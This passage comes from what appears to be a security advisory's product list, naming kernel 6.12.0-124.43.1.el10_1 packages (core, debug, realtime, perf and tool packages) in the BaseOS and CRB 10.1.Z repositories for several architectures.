"BaseOS-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
